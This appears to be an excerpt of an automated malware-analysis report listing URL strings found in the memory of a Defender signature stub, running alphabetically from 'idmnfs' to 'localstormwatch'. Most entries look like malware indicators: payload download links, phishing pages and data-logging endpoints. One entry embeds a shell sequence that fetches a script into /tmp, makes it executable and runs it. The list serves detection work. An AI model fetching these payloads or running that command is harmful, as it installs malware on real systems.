Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	String found in binary or memory: http://idmnfs.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://ie.search.psn.cn/
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://iefeadsl.com/feat/
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: http://iframe.ip138.com/ic.asp
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://ilogs.forgetmenotbeading.com/images/get.bin%appdata%
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://ilya-popov.ru/wp-content/uploads/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://image.soso.com/image.cgi?w=%s
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://images-saver.pw/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://images.google.cn/images?q=%s
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://images.timekard.com/default.png
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://imd.gdyiping.com
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://img-save.xyz
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://img.zhongsou.com/i?w=%s
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: http://imp.fusioninstall.com/impression.do/?event=installer_start&referrer=x
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	String found in binary or memory: http://imp.mymapsxp.com/
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://imp.theweathercenter.co/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://impemarinestore.com/stub.exe
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://in-t-h-e.cn/show/main.php?r=
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://incredicole.com/wp-content/themes/elegant-grunge/images/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://indonesiacyberteam.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://inent17alexe.rr
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://infolokercpns.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://ingridzinnel.com/invoices-attached/
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: http://init.crash-analysis.com
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: http://init.icloud-analysis.com
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: http://init.icloud-diagnostics.com
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://injectsorals.com/
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://inline477.info/fsrv
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://inquiry.space/lucky.doc
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://ins.pricejs.net/dealdo/install-report
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://ins.pricejs.net/dealdo/install-report?type=install
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://ins.quickinstallpack.com/?action=
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://ins.rdxrp.com/stats/
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://insf.quickinstallpack.com/?action=
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://insightout-me.com/backup/excellview.php
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://install.outbrowse.com/logTrack.php?x
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://install.xxxtoolbar.com/ist/scripts/prompt.php?
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://installation59.website/my/
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://installdream.com/download/blankNet2.dat
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://installer.mediapassplugin.com/
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://installmp3codec.info/
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://installs.hotbar.com/installs/hotbar/programs/
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: http://instamailserver.link/finito.ps1
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://instituitartetculture.com/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://instituthypnos.com/maps1316/ki_d/
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://int.dpool.sina.com.cn/iplookup/iplookup.php
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://interface.kokmobi.com/newservice
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: http://interstat.eux
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://investmenteducationkungykmtsdy8agender.duckdns.org/office/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://ios-certificate-update.com
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://ios-update-whatsapp.com
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=queryz
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://ip.aq138.com/setip.asp
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://ippp.co.zw/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://isearch.omiga-plus.com/?type=sc
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://ismailiyamedical.com/ds/151120.gif
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://istanbulyilbasimekanlari.com/tracking-number-
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://istart.webssearches.com/?type=sc
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://isvbr.net
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://isvbr.net?t=
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://itemprice.kr
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://itsmetees.com/wp-admin/network/doc/
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://iy6h86i.sed.tiresnwheels4fun.com
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://iz.orda.icu/webiz.php
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://izfm.org/data/image/html/
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://j.pricejs.net/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://jL.chura.pl/rc/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://jaculus.ru/902b3449e3e8/interbase/counteract/neat/luxurious/relate/jjibwjhi.dot
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://jaklaw.co/wp-includes/js/plupload/db/view/
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://japanesecosplaygirl.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://jast56kl.com/help/index.php
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://java-se.com/o.js
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://java.sun.com/products/autodl/j2se
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://javafx.com
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: http://javascriptobfuscator.com
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://jay6.tech/wp-content/themes/twentynineteen/template-parts/cont
Source: MpSigStub.exe, 00000023.00000003.6279385939.0000028BD6BD6000.00000004.00000001.sdmp	String found in binary or memory: http://jetroute.net
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://jiglid.com/ms.xlsx
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://jjjjjkl.pe.hu/doc
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://jmmgroup.ae/213.doc
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: http://jmmgroup.ae/coo.exe
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://jobylive2.w22.haohaohost.cn/c/abbx/qqpost.asp
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://joelosteel.gdn/eml/put.php
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://joelosteel.gdn/pi.php
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://johnnyslandscaping.org/over.php
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://josephioseph.com/htamandela.hta
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: http://joxi.ru/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://jquerystatistics.org/update.js
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: http://jqueryui.com
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://js.f4321y.com/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://js.k0102.com/ad
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: http://js.mykings.pw:280/v.sctscrobj.dll
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://js.mys2018.xyz:280/v.sct
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://js.pkglayer.com
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://js.pkglayer.comx
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://jugnitv.com/final.jpg
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://juiillosks.sytes.net/
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://jump.qq.com/clienturl_
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://jump.qq.com/clienturl_100?clientuin=
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://jump.qq.com/clienturl_15
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://juntec.es/rechnung-18561/
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://justgaytgp.net/rd/out.php
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://jxmienphi.net/update/
Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp	String found in binary or memory: http://jxvh.com/goto.php
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://jyhjyy.top
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://kanzlercompanies.com?
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://kapper.st/info.txt
Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp	String found in binary or memory: http://karab.hopto.org/sarg.dot
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://karadyma.com/dhlpack/kfqakff/)
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://karafetdoll.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://kastarmgt.com?
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://kastarqsr.com?
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://kavok.ind.br/ds/2312.gif
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp	String found in binary or memory: http://keeppure.cn/tool/xxz.exe
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://kemra.co.ke/bbaoh/
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://keramikadecor.com.ua/bdfg/excelzz/index.php
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	String found in binary or memory: http://keratomir.biz/get.php?partner=
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://keyba01se.usa.cc/ktg.doc
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://khaleejposts.com/rgk/m_rs/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://king.connectioncdn.
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://kiranacorp.com/oja
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://kishi73.com.br/
Source: MpSigStub.exe, 00000023.00000003.6268133446.0000028BD6E8E000.00000004.00000001.sdmp	String found in binary or memory: http://kit.mastacash.com/
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: http://kle.austries
Source: MpSigStub.exe, 00000023.00000003.6279726781.0000028BD6C0C000.00000004.00000001.sdmp	String found in binary or memory: http://kokovs.cc/porno/stat.php
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://kollaboration.intranet.stzh.ch/orga/asz-aszdokumentenbibliothek/Vorlagen/Makros/MakroMasterSt
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://kolo.crionn.com/kolo.php
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://kolyherqylwa9ru.top/log.php?f=400
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://korserver.com
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://kovpro.com
Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp	String found in binary or memory: http://kp.9
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://kredytinksao.pl/raw.txt
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: http://kremlin-malwrhunterteam.info/scan.exe
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://krisrnilton.pl/mswiner.exe/payload-obfuscated-final.docx
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://ks.pcgames.com.cn/games_index.jsp?q=%s
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://ks.pconline.com.cn/index.jsp?qx=download&q=%s
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://ksn.a
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://ktr.freedynamicdns.org/backups/post.php
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://kubusse.ru/data
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://kungsb2africanbestfootballereverinkerso.duckdns.org/kung2doc/
Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp	String found in binary or memory: http://kupeer.com/xd
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://kurs.ru/index
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://l1ke.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://lab.l4ever.cn/ip/api/
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://lapapahoster.com/safe_download/
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://laurenbowling.com/redeem-ucount-rewards-standardbank-credit=card-service/php/
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://lavajatowi.sslblindado.com/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://lazexpo.info/
Source: MpSigStub.exe, 00000023.00000003.6346352877.0000028BD65BA000.00000004.00000001.sdmp	String found in binary or memory: http://ldjb.sriki.space/is/cact?i
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://ldvamlwhdpetnyn.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://led21.pro/wp-content/themes/betheme/images/headers/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://lem18iuru03vwvqwt.xyz/ff.gif
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://lexandermagic.com/163-97-242097-905-163-97-242097-799/
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://lh.cjishu.com/index.php
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://lhx8z06.sed.nutritionservices.com
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://libre-templates.ddns.net/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://librebooton.ddns.net/booton.dot
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://libya2020.com.ly/music.mp3
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://lifeandoil.myjino.ru/crg-bin/c/admin/adobe_pdf/adobe.html
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://lifehealthcareindia.com/google/google.php
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://lightday.pl/wp-content/themes/lightday/images/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://line.largefamiliesonpurpose.com/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://lineacount.info/cgi-bin/
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://linkurytest-bumbleb-stats-westeurope.cloudapp.netxi
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://linux.ghststr.com/lllol/0-o/tmp/s.sh&&cd/tmp/&&chmod777s.sh&&bashs.sh-o-2
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://lipostes.tk/98765.pdf
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://lithi.io/file/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://livefrom.ge/modules/mod_swfobject/enfo.php
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://liveswindows.cyou/opzi0n1.dll
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://liveupdatesnet.com/
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://lk2gaflsgh.jgy658snfyfnvh.com/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://ll.protected.secured.adobe
Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp	String found in binary or memory: http://lnk.direct/xzx
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://lnkiy.in/cloudfileshare
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://lo0oading.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://local45.net
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://localhost/st.php
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://localhost:4173/BaiduClickerClient.asmx?WSDLx
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://localhost:62338/Chipsetsync.asmx
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://localhost:8000/cmd.exe
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://localstormwatch.com
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://localstormwatch.comx
